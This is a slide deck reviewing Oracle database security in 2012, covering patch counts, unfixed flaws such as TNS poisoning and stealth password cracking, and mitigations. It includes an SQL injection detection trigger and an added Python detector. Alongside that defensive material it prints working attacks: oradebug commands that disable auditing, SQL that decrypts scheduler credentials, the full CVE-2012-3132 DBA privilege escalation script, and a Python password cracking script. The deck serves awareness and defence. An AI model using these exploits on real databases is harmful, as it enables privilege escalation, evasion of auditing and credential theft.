Best of Oracle Security 2012 - Red-Database-Security

Post on 20-Sep-2018


Best of Oracle Security 2012

What happened in 2012

Agenda

! Recapitulation 2011

! January 2012 - October 2012

! Q&A

Recapitulation 2011

Oradebug

! Undocumented function in Oracle

! Details published in 2011 (Hacktivity 2011*)

! Allows to run OS commands

! Allows to disable normal and SYS auditing

! Can't be audited

! Platform-independent solution without poke added

* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf


UNFIXED

Disable Oracle Auditing

```text
SQL> oradebug setmypid
Statement processed.
SQL> oradebug setvar sga kzaflg_ 0
BEFORE: [1492F4EC0, 1492F4EC4) = 00000001
AFTER:  [1492F4EC0, 1492F4EC4) = 00000000
```

2012 - The Good, The Bad, The Ugly

The good

Lowest number of vulnerabilities in the Oracle database ever

! Only 17 findings in 2012 (2011: 29, 2010: 31)

! More (8) remotely exploitable bugs (2011: 5)

• January 2012 CPU (2 vulnerabilities – 1 remote)

• April 2012 CPU (6 vulnerabilities – 3 remote)

• July 2012 CPU (4 vulnerabilities – 3 remote)

• October 2012 CPU (5 vulnerabilities – 1 remote)

The bad

Critical bugs are not fixed (only workarounds)

! SCN bug was not fixed

! TNS Poisoning was not fixed

! Stealth Password Cracking was not fixed

The ugly

Oracle Corporation

! Really bad communication skills (TNS poisoning)

! Unwilling to fix problems (TNS poisoning, stealth password cracking)

! Customers are blamed for issues not being fixed: „Customers have requested that Oracle not include such security fixes into Critical Patch Updates ...“

2012

January 2012

• Oracle CPU January 2012 *

• Problem with large Sequence Change Numbers (SCN) **

* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html

** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0

January 2012 CPU*

• 2 security fixes (1 remotely exploitable)

• Core RDBMS

• TNS Listener

SCN Problem

! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.

! Due to a problem in the backup, the SCN increases dramatically

! The undocumented parameter _minimum_giga_scn allows setting the SCN to a chosen value

! The backup bug and the undocumented parameter were fixed/removed via the January 2012 CPU.

* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html


UNFIXED

Diagram: DB1 (SCN: 10 Mio) and DB2 (SCN: 2 Mio) are connected via a Database Link. Compare 10 Mio vs. 2 Mio and take the highest number.

Undocumented Oracle Parameter or Backup bug is dramatically increasing the SCN

Use the undocumented parameter and set the time of the attacker database to a point in the future and use a huge SCN.

Diagram: Attacker database (SCN: Huge SCN) connected via a Database Link to DB2, which takes over the huge SCN. DB crash after a while.

Scheduler Credentials

Decrypt Oracle Scheduler Credentials

```sql
exec DBMS_SCHEDULER.CREATE_CREDENTIAL(credential_name => 'local_credential', username => 'oracle', password => 'welcome1');

select o.object_name credential_name, username, password
  FROM SYS.SCHEDULER$_CREDENTIAL c, DBA_OBJECTS o
 WHERE c.obj# = o.object_id;
```

```text
CREDENTIAL_NAME    USERNAME PASSWORD
------------------ -------- ------------------------------------
LOCAL_CREDENTIAL   oracle   BWVYxxK0fiEGAmtiKXULyfXXgjULdvHNLg==
LOCAL_CREDENTIAL2  oracle2  BWyCCRtd8F0zAVYl44IhvVcJ2i8wNUniDQ==
```

```sql
SELECT u.name CREDENTIAL_OWNER, O.NAME CREDENTIAL_NAME, C.USERNAME,
       DBMS_ISCHED.GET_CREDENTIAL_PASSWORD(O.NAME, u.name) pwd
  FROM SYS.SCHEDULER$_CREDENTIAL C, SYS.OBJ$ O, SYS.USER$ U
 WHERE U.USER# = O.OWNER#
   AND C.OBJ#  = O.OBJ#;
```

```text
CREDENTIAL_OWNER CREDENTIAL_NAME      USERNAME PWD
---------------- -------------------- -------- --------
SYS              LOCAL_CREDENTIAL     oracle   welcome1
SYS              LOCAL_CREDENTIAL2    oracle2  welcome1
```

„...bit 0x20000 - start DBMS_DEBUG_JDWP.CONNECT_TCP in file watcher bitand( ,131072) starts DBMS_DEBUG_JDWP.CONNECT_TCP on localhost, port 4444. I'm not sure if I like this event. In general I don't want any software opening connections without my knowing. And I could not find this documented anywhere. Is it fair to call this a backdoor?...“

Due to undocumented functionality, DBMS_SCHEDULER listens on port 4444 if a special parameter is used.

March 2012

• Disabling Oracle trigger on a per-session basis *

• Self-Defending Databases **

* http://www.pythian.com/news/30781/disabling-triggers-per-session/

** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf

Disable Oracle Triggers for a session

```text
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true);
PL/SQL procedure successfully completed.
```

Disable all triggers for a session. This could be used to bypass shadow/history table architectures.

Feature

Self-defending Databases

• Nearly every SQL injection abused from the web creates errors in the database

• A typical attack takes less than 2 minutes to download data

• 2 minutes are too short for humans to react

• But the database itself is able to detect these kinds of attacks by looking at the specific error messages created by the SQL injection attack

• After detection the appropriate countermeasures can be taken.


Detection of SQL Injection Attacks (from the web)

• Depending on the attack method used (UNION, extending the query, creating error messages to retrieve data, …) a specific error will be created, e.g.

ORA-01789: query block has incorrect number of result columns

• Or

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'mypassword' to a column of data type int. /Administrator/login.asp, line 27

Detection of SQL Injection Attacks (from the web)

Out of the box, databases like Oracle or Microsoft SQL Server are able to detect SQL-specific error messages and can run (custom) code (= countermeasure) after the detection.

These specific database errors only occur if a vulnerability exists and this vulnerability was triggered by a specific string (e.g. “or 1=1--”).

False positives are rare. A false positive could occur if developers are deploying applications with incorrect SQL statements (e.g. a missing single quote).

SQL Injection Error Codes Oracle - I

| Error code | Error Message | Typical Command |
|---|---|---|
| ORA-00900 | invalid SQL statement | |
| ORA-00906 | missing left parenthesis | |
| ORA-00907 | missing right parenthesis | |
| ORA-00911 | invalid character | e.g. PHP MAGIC_QUOTES_GPC activated and attempt to inject a single quote |
| ORA-00917 | missing comma | |
| ORA-00920 | invalid relational operator | |
| ORA-00923 | FROM keyword not found where expected | |
| ORA-00933 | SQL command not properly terminated | |
| ORA-00970 | missing WITH keyword | |
| ORA-01031 | insufficient privileges | Attempted privilege escalation |
| ORA-01476 | divisor is equal to zero | Blind SQL injection attempt (e.g. sqlmap) |
| ORA-01719 | outer join operator not allowed in operand of OR or IN | |
| ORA-01722 | invalid number | Enumeration with rownum and current rownum does not exist |

SQL Injection Error Codes Oracle - II

| Error code | Error Message | Typical Command |
|---|---|---|
| ORA-01742 | comment not properly terminated | inline comment, e.g. optimizer hint is not properly terminated |
| ORA-01756 | quoted string not properly terminated | single quote not properly terminated |
| ORA-01789 | query block has incorrect number of result columns | Attempt to use UNION SELECT |
| ORA-01790 | expression must have same datatype as corresponding expression | Attempt to use UNION SELECT |
| ORA-24247 | network access denied by access control list | Oracle ACL has blocked the usage of UTL_INADDR (or similar) |
| ORA-29257 | host %s unknown | Attempted SQL injection via utl_inaddr |
| ORA-29540 | class does not exist | Attempted utl_inaddr attempt but Java is not installed |
| ORA-31011 | XML parsing failed | SQL injection attempt via xmltype |
| ORA-19202 | Error occurred in XML processing | SQL injection via extractvalue |

```sql
CREATE OR REPLACE TRIGGER after_error
AFTER SERVERERROR ON DATABASE
DECLARE
  sql_text  ORA_NAME_LIST_T;
  v_stmt    CLOB;          -- SQL statement causing the problem
  n         NUMBER;        -- number of chunks for constructing the SQL statement causing the error
  v_program VARCHAR2(64);
  v_serial  NUMBER;
  v_sid     NUMBER;
BEGIN
  -- Version 1.00
  SELECT program, serial#, sid
    INTO v_program, v_serial, v_sid
    FROM v$session
   WHERE sid = SYS_CONTEXT('USERENV', 'SID');

  -- construct the SQL text from its chunks
  n := ora_sql_txt(sql_text);
  IF n >= 1 THEN
    FOR i IN 1..n LOOP
      v_stmt := v_stmt || sql_text(i);
    END LOOP;
  END IF;

  FOR n IN 1..ora_server_error_depth LOOP
    IF (lower(v_program) = 'iis.exe')  -- add your own application server
       AND (ora_server_error(n) IN (942, 900, 906, 907, 911, 917, 920, 923, 933, 970,
                                    1031, 1476, 1719, 1722, 1742, 1756, 1789, 1790,
                                    19202, 24247, 29257, 29540, 31011))
    THEN
      -- Potential attack was detected
      -- 1. Monitor the attack
      -- 2. Send an email to the responsible person (DBA/MoD)
      --    send_email (e.g. via utl_smtp)
      -- 3. Lock the database user used by the webapp
      EXECUTE IMMEDIATE 'ALTER USER /* Error_Trigger */ "'
                        || SYS_CONTEXT('USERENV', 'SESSION_USER') || '" ACCOUNT LOCK';
      -- 4. Terminate the session: ALTER SYSTEM KILL SESSION 'session-id,session-serial'
      EXECUTE IMMEDIATE 'ALTER SYSTEM /* Error_Trigger */ KILL SESSION '''
                        || v_sid || ',' || v_serial || '''';
      -- 5. Other countermeasures
    END IF;
  END LOOP;
END after_error;
/
```
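To show the decision logic of the SERVERERROR trigger and the two error-code tables outside the database, here is an added Python example (not from the deck or from Red-Database-Security). It assumes a constructed event line format carrying the v$session fields the trigger reads, and it returns the countermeasure statements for review instead of executing them.

```python
import re

# Error codes from the two "SQL Injection Error Codes Oracle" tables above,
# mapped to the attack pattern the deck associates with them.
SQLI_ERRORS = {
    900: "invalid SQL statement",
    906: "missing left parenthesis",
    907: "missing right parenthesis",
    911: "invalid character (magic quotes escaping an injected single quote)",
    917: "missing comma",
    920: "invalid relational operator",
    923: "FROM keyword not found where expected",
    933: "SQL command not properly terminated",
    970: "missing WITH keyword",
    1031: "insufficient privileges (attempted privilege escalation)",
    1476: "divisor is equal to zero (blind SQL injection, e.g. sqlmap)",
    1719: "outer join operator not allowed in operand of OR or IN",
    1722: "invalid number (enumeration with rownum)",
    1742: "comment not properly terminated (inline comment)",
    1756: "quoted string not properly terminated (single quote)",
    1789: "query block has incorrect number of result columns (UNION SELECT)",
    1790: "expression must have same datatype (UNION SELECT)",
    19202: "error occurred in XML processing (extractvalue)",
    24247: "network access denied by ACL (UTL_INADDR or similar)",
    29257: "host unknown (utl_inaddr)",
    29540: "class does not exist (utl_inaddr without Java)",
    31011: "XML parsing failed (xmltype)",
}

# Constructed event format (an assumption, not an Oracle log format): one
# server error per line with the session details the trigger reads from v$session.
EVENT_RE = re.compile(
    r"^(?P<ts>\S+) sid=(?P<sid>\d+) serial=(?P<serial>\d+) user=(?P<user>\w+) "
    r"program=(?P<program>\S+) ORA-(?P<code>\d{5})\b"
)


def parse_event(line):
    """Return a dict for a well-formed event line, None otherwise."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return {"ts": d["ts"], "sid": int(d["sid"]), "serial": int(d["serial"]),
            "user": d["user"], "program": d["program"], "code": int(d["code"])}


def countermeasures(event):
    """The statements the deck's trigger issues, returned for review."""
    return [
        'ALTER USER "%s" ACCOUNT LOCK' % event["user"],
        "ALTER SYSTEM KILL SESSION '%d,%d'" % (event["sid"], event["serial"]),
    ]


def assess(event, app_programs):
    """Mirror the trigger's decision for one server error.

    'react'  : error is in the table and came from the web application's own
               database session (the trigger case).
    'review' : same error from another client program, e.g. a developer's
               sqlplus typo: the false-positive case the deck mentions, so it
               is reported without locking anyone out.
    None     : an ordinary application error that is not in the table.
    """
    pattern = SQLI_ERRORS.get(event["code"])
    if pattern is None:
        return None
    from_app = event["program"].lower() in app_programs
    return {
        "action": "react" if from_app else "review",
        "code": event["code"], "pattern": pattern,
        "user": event["user"], "sid": event["sid"],
        "countermeasures": countermeasures(event) if from_app else [],
    }


def run_detection(lines, app_programs=("iis.exe",)):
    """Classify every event line; returns the list of alerts in input order."""
    programs = tuple(p.lower() for p in app_programs)
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        verdict = assess(event, programs)
        if verdict is not None:
            alerts.append(verdict)
    return alerts


# Constructed sample events: a UNION SELECT probe from the web application's
# session, a developer typo in sqlplus, and an unrelated constraint error.
SAMPLE_EVENTS = """\
2012-03-01T10:00:01 sid=145 serial=2071 user=WEBAPP program=iis.exe ORA-01789: query block has incorrect number of result columns
2012-03-01T10:00:02 sid=145 serial=2071 user=WEBAPP program=iis.exe ORA-01790: expression must have same datatype as corresponding expression
2012-03-01T10:05:00 sid=201 serial=33 user=DEV01 program=sqlplus.exe ORA-01756: quoted string not properly terminated
2012-03-01T10:06:00 sid=145 serial=2071 user=WEBAPP program=iis.exe ORA-00001: unique constraint violated
"""

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS.splitlines()):
        print(alert["action"], alert["user"], alert["code"], alert["pattern"])
        for stmt in alert["countermeasures"]:
            print("   ", stmt)
```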

April 2012 CPU*

• 6 security fixes (3 remotely exploitable)

• Core RDBMS

• OCI

• Enterprise Manager

* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html

TNS Poisoning

• Reported by Joxean Koret in 2008 to Oracle*

• Everyone with access to the listener can redirect any network traffic by registering a second listener.

• Affects all versions of Oracle (8i-11g R2)

• Due to a communication problem („was fixed in a future version“) the discoverer of this bug released an advisory including proof-of-concept code (for SIDs with 6 characters).

• To implement a workaround, Oracle even changed the license agreement for RAC (inclusion of Advanced Security Option ASO) to be able to protect RAC.

* http://seclists.org/fulldisclosure/2012/Apr/204


UNFIXED


Diagram: Attacker Listener, Victim and the database Listener.

Register additional listener

Victim logon

Redirect network traffic of the victim

Forward to the database again

Attacker is now man in the middle (MITM)

TNS Poisoning - Statements Oracle*

• Oracle: „The fix is very complex and it is extremely risky to backport.“

• Oracle: „This fix is in a sensitive part of our code where regressions are a concern.“

• Oracle: „Customers have requested that Oracle not include such security fixes into Critical Patch Updates that increases the chance of regressions.“

• Oracle: „To protect the interest of our customers, we do not provide these level of details (like versions affected) for the issues that are addressed as in-depth. The future releases will have the fix.“

* http://seclists.org/fulldisclosure/2012/Apr/343

TNS Poisoning - Statement Researcher *

• Joxean: „So, as previously stated, this is a 0day vulnerability with no patch, Oracle refuses to patch the vulnerability in *any* existing version and Oracle refuses to give details about which versions will have the fix. But they say the vulnerability is fixed. Cool.“

* http://seclists.org/fulldisclosure/2012/Apr/343

TNS Poisoning - Workarounds

• There are different workarounds available (COSTS parameter, dynamic registration, restricted_nodes)

• There are 2 documents for non-RAC and RAC systems available in Oracle MyOracleSupport (1453883.1, 1340831.1) describing the workarounds

• Testing is necessary to avoid side-effects (e.g. Grid Control, IP restriction in sqlnet.ora & IPC)

• set dynamic_registration=off

MySQL - Password Problem*,**

! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?" "How about now?" "Now?"

! Pwnie for Best Server-Side Bug

! Free scanner/script to abuse this vulnerability available **

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

*** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow

May 2012

• nothing special happened

June 2012

• nothing special happened

July 2012

• Oracle CPU July 2012 *

* http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html

July 2012 CPU*

• 4 security fixes (3 remotely exploitable)

• Core RDBMS

• Enterprise Manager

• Network Layer

• A hidden security bug in Oracle Text (BlackHat 0day) was fixed without being mentioned.

• Fixing security bugs without documenting it is a common Oracle practice.

August 2012

• 0day privilege escalation exploit (CVE-2012-3132) for Oracle 11g released at BlackHat 2012 Las Vegas *

• Out-of-band patch for Oracle ** („Oracle Database Server versions 11.2.0.2 and 11.2.0.3 do not require patching if the July 2012 Critical Patch Update has been applied.“)

* http://www.slaviks-blog.com/2012/08/03/another-blackhat-another-oracle-0day/

** http://www.oracle.com/technetwork/topics/security/alert-cve-2012-3132-1721017.html

```sql
connect blackhat/password

set role dba; -- throws an error

create or replace function X return varchar authid current_user is
  pragma autonomous_transaction;
begin
  execute immediate 'GRANT DBA TO BLACKHAT';
  commit;
  return 'FOO';
END;
/

grant execute on X to public;

create table pwnoracle (id number(20) not null, "FOO'||BLACKHAT.X||'BAR" BLOB);

create index i_pwnoracle on pwnoracle("FOO'||BLACKHAT.X||'BAR") indextype is ctxsys.context;

exec dbms_stats.gather_table_stats(USER,'PWNORACLE',cascade=>TRUE);

drop table pwnoracle;

set role dba;
```

September 2012

• Stealth Password Cracking exploit released

• Cleartext passwords at OCI client side

• Metasploit/Meterpreter modules for

  • TNS Poisoning

  • Get cleartext passwords client-side

  • Get cleartext passwords server-side

  • Run OS commands (via oradebug)

• Side channel attack on ORA-00942

Stealth Password Cracking

! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *

! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue

! Due to a flaw in the logon protocol (version 11) an attacker can crack passwords without invalid login attempts

! Incomplete logon is not audited

! Oracle did not fix this problem. They removed the OLogon 11 protocol once the October 2012 CPU is applied and recommend using the old DES hashes. ==> This could cause compatibility problems with clients < 11.2.0.3

* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012

** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137


UNFIXED

Stealth Password Cracking I

Diagram: message exchange between the attacker and the database server.

1.) Logon: SYSTEM

2.) Get hash and salt of user SYSTEM (USER$.SPARE4)

3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08

4.) Send salt + encrypted session key

5.) Stop logon process (no PW sent -> not an invalid login attempt)

6.) Generate password hash (e.g. SHA1(manager||salt))

7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)

8.) Check if the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08

9.) If true then password found, else try a new password

Stealth Password Cracking II

! Attacker sends a username (e.g. SYSTEM) without a password to the database

! The database reads the password hash of the user SYSTEM

! A newly generated session key is padded with \x08\x08\x08\x08\x08\x08\x08\x08

! The result is encrypted (AES) with the password salt of the user

! The encrypted session key + the salt is sent to the attacker

! Attacker stops the login process

* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137

Stealth Password Cracking III

! Attacker now generates SHA1 hashes for common passwords using the salt received from the database

! This hash is used to decrypt the received session key

! If the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08 the password is known

Pseudo-Code

! users.txt (list of common users), dict.txt (common passwords)

```text
for all entries in users.txt do
  result := send_logon_packet(USERNAME)
  if result contains a salt then    -- we found a valid user
    for all passwords in dict.txt do
      hash   := sha1(password || salt)
      decres := decrypt_aes(session_key, hash)
      if decres contains \x08\x08\x08\x08 then print „password found“
    od
  od
od
```

! Thousands of (local) tests could be done in a second. Only 1 network packet per username.

```python
# Python 2 / PyCrypto, as on the original slide
import hashlib
from Crypto.Cipher import AES


def decrypt(session, salt, password):
    pass_hash = hashlib.sha1(password + salt)
    key = pass_hash.digest() + '\x00\x00\x00\x00'   # 20-byte SHA1 digest padded to a 24-byte AES key
    decryptor = AES.new(key, AES.MODE_CBC)          # zero IV (old PyCrypto default)
    plain = decryptor.decrypt(session)
    return plain


session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
salt_hex = 'A7193E546377EC56639E'
passwords = ['test', 'password', 'oracle', 'demo']

for password in passwords:
    session_id = decrypt(session_hex.decode('hex'), salt_hex.decode('hex'), password)
    print 'Decrypted session_id for password "%s" is %s' % (password, session_id.encode('hex'))
    # the last 8 bytes of a correctly decrypted session key are the \x08 padding
    if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
        print 'PASSWORD IS "%s"' % password
        break
```

Stealth Password Cracking II

! Tools already exist (John the Ripper)

! Up to 1 million password tests per second

Mitigation of the problem

! (No patch) Switch back to the old DES password hashes by using the parameter SEC_CASE_SENSITIVE_LOGON=FALSE

! The Oracle October 2012 CPU removes the vulnerable protocol and automatically switches back to OLogon V10

! Set sqlnet.allowed_logon_version=12 to switch to OLogon protocol V12. This requires an 11.2.0.3 client

DerbyCon / Hacktivity Presentation of László Tóth and Ferenc Spala

! Presentation about database security without SQL Injection

! New flaw in the OCI driver

! Presentation of tools for Metasploit to run OS commands, abuse the TNS poisoning bug and get cleartext passwords (server and client).

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! The password at the client side is stored encrypted (DES) in memory after the logon process was completed.

! Even if the database session is closed, the password (and username) stays in memory

! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords

! A trojan running on a DBA machine could use this to collect the decrypted passwords

! No workaround/fix is available

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

UNFIXED

Metasploit / Meterpreter Modules

! Metasploit is an open-source security framework. Meterpreter is an advanced payload for Metasploit

! Metasploit module: oradebug - run OS commands via oradebug call system

! Metasploit module: tnspoison - allows redirecting network traffic to pytnsproxy

! PYTNSPROXY: TNS proxy which is used together with the tnspoison Metasploit module

! Meterpreter extension: oralog - logs cleartext passwords by hooking into the encryption/decryption routine of the DB server

! Meterpreter extension: ocioralog - logs the cleartext password from the OCI driver

Concept

! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.

! If a SYSDBA connects to the database server, the session could be taken over

! The oradebug feature is used to inject code into the process space of the database and hook into the decrypt functions

! All database passwords are written in cleartext into a text file (contains all passwords, including DB Vault)

! The file with the passwords can be transferred to the computer of the attacker.

Run OS Commands from the web

http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

Side Channel attack on ORA-00942 *

! Martin Berger showed that a side channel attack is possible against Oracle and ORA-00942 *

! The number of recursive calls and the execute count allow finding out whether an object exists.

* http://berxblog.blogspot.com.au/2012/09/side-channel-attack-on-ora-00942.html


```sql
select ms.sid, ms.statistic#, sn.name, ms.value
  from v$mystat ms, v$statname sn
 where sn.name in ('recursive calls', 'execute count')
   and ms.statistic# = sn.statistic#
 order by 2;
```

```text
SQL> select * from a.uztrfghj;
select * from a.uztrfghj
               *
ERROR at line 1:
ORA-00942: table or view does not exist

21 recursive calls
3 execute count
```

No user ZZZ exists, but a user A exists (but no table A.UZTRFGHJ). There is one more recursive call if the user exists.

```text
SQL> select * from a.m;
select * from a.m
               *
ERROR at line 1:
ORA-00942: table or view does not exist

26 recursive calls
7 execute count
```

Now there are even more recursive calls and a higher execute count. The table A.M exists.

October 2012

• Oracle CPU October 2012 *

• Application Security of Core Banking Systems **

* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html

** https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm

October 2012 CPU*

• 5 security fixes (1 remotely exploitable)

• Core RDBMS

* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html


November 2012

• DOAG 2012

Summary

! Annus horribilis for Oracle (Java, MySQL, Oracle)

! Easy SQL injection bugs in PL/SQL are nearly gone. Researchers are looking for more complicated bugs.

! Critical bugs are not fixed; only workarounds are available

! Nearly all databases (TNS Poisoning) or 11g databases (Stealth Password Cracking) are affected.

Thank you! Contact:

Red-Database-Security GmbH

Bliesstr. 16

D-66538 Neunkirchen

Germany
